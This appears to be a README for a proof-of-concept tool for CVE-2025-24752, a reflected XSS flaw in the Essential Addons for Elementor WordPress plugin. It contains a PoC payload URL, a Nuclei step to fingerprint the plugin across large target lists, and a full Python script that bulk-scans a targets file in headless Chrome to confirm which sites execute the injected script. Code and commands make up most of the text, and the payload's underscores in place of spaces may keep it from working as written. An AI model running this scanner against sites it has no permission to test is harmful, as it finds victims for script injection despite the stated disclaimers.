This tool is for security research and patching purposes only. Do not use it to harm sites. If you find vulnerable sites, report them responsibly to site owners so they can update immediately.
A reflected XSS vulnerability in the Essential Addons for Elementor WordPress plugin affects more than 100,000 websites running versions below 6.0.15 (6.0.14 and earlier). It has been assigned CVE-2025-24752.
https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1
pip install selenium webdriver-manager
python poc.py targets.txt
- Browser-confirmed detection: unlike nuclei or httpx, which only match a reflected string in the HTTP response, this script loads the PoC URL in a real browser and treats a target as vulnerable only when the JavaScript alert actually fires.
- Bulk scanning: processes a list of targets from a file (slower than a plain HTTP scanner, because every candidate is confirmed in a browser).
- Plugin detection: a Nuclei template for fingerprinting the plugin is included in assets (detect-elementor-for-xss.yaml), so a large target list can be narrowed to sites running Essential Addons before the slower browser-based check.
The vulnerability is caused by insufficient validation and sanitization of the popup-selector query argument, which allows an attacker-controlled value to be reflected back to the user in the response. Fixed in version 6.0.15.
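The browser-based confirmation described above, written out as an added example (this is not the project's poc.py). It builds the PoC URL from an arbitrary target while preserving any existing path and query string, uses a per-run marker instead of a fixed string so that a stale or unrelated alert is not mistaken for a hit, and only reports a target as vulnerable when headless Chrome raises an alert carrying that marker. The payload is copied verbatim from the PoC URL on this page; the helper names, the `unhandledPromptBehavior` capability and the version check against 6.0.15 are assumptions made for the example. `selenium` and `webdriver-manager` are only imported when the browser check runs, so the URL-building and version helpers work offline.

```python
"""Browser-confirmed check for CVE-2025-24752 (reflected XSS via popup-selector).

Added example, not the project's own poc.py. Assumes the marker string passed
to alert() is reflected unchanged by a vulnerable site, and that `selenium` and
`webdriver-manager` are installed for confirm_in_browser() (the other helpers
need only the standard library).
"""
import re
import sys
import uuid
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

FIXED_VERSION = (6, 0, 15)  # first patched release according to the advisory


def is_vulnerable_version(version: str) -> bool:
    """True when a fingerprinted plugin version is below the fixed 6.0.15 release."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version))
    if not parts:
        raise ValueError(f"no numeric version in {version!r}")
    parts = parts + (0,) * (3 - len(parts))  # "6.0" compares as 6.0.0
    return parts[:3] < FIXED_VERSION


def build_poc_url(target: str, marker: str) -> str:
    """Append the PoC parameters to a target URL, keeping its path and query.

    The payload is the one from the page's PoC URL (underscores included);
    urlencode() percent-encodes it, which is what a browser would do anyway.
    """
    if "://" not in target:
        target = "https://" + target  # assumption: bare hostnames are HTTPS
    scheme, netloc, path, query, _fragment = urlsplit(target)
    params = dict(parse_qsl(query, keep_blank_values=True))
    params["popup-selector"] = f'<img_src=x_onerror=alert("{marker}")>'
    params["eael-lostpassword"] = "1"
    return urlunsplit((scheme, netloc, path or "/", urlencode(params), ""))


def load_targets(text: str) -> list:
    """Parse a targets file: one host or URL per line, '#' comments and blanks ignored."""
    targets = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            targets.append(line)
    return targets


def confirm_in_browser(url: str, marker: str, timeout: int = 10) -> bool:
    """Load the PoC URL in headless Chrome; True only if alert(marker) fires.

    Requires network access and a Chrome install (webdriver-manager fetches
    the matching chromedriver). Assumption: keeping the prompt open via the
    'ignore' unhandled-prompt behaviour lets us read the alert after get().
    """
    from selenium import webdriver
    from selenium.common.exceptions import TimeoutException, WebDriverException
    from selenium.webdriver.chrome.options import Options
    from selenium.webdriver.chrome.service import Service
    from selenium.webdriver.support import expected_conditions as EC
    from selenium.webdriver.support.ui import WebDriverWait
    from webdriver_manager.chrome import ChromeDriverManager

    opts = Options()
    opts.add_argument("--headless=new")
    opts.set_capability("unhandledPromptBehavior", "ignore")
    driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=opts)
    try:
        try:
            driver.get(url)
        except WebDriverException:
            pass  # the alert may interrupt page load; we inspect it below either way
        alert = WebDriverWait(driver, timeout).until(EC.alert_is_present())
        text = alert.text
        alert.accept()
        return text == marker  # a different alert is not evidence for this CVE
    except TimeoutException:
        return False
    finally:
        driver.quit()


if __name__ == "__main__":
    # usage: python this_script.py targets.txt  (only against sites you are authorised to test)
    with open(sys.argv[1], encoding="utf-8") as fh:
        targets = load_targets(fh.read())
    for target in targets:
        marker = uuid.uuid4().hex[:12]  # fresh marker per target
        url = build_poc_url(target, marker)
        print(("VULNERABLE " if confirm_in_browser(url, marker) else "not confirmed ") + target)
```

The marker comparison is the part worth keeping even if you swap the browser driver: a reflection-only scanner would flag any page that echoes the parameter, including ones that HTML-encode it, whereas matching the alert text proves the value reached script execution.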
For more details: Patchstack Article
This tool is provided for educational and protective purposes only. Always obtain proper authorization before testing any website for vulnerabilities. The author is not responsible for misuse of this tool.
Thanks to responsible security researchers who identified and reported this vulnerability.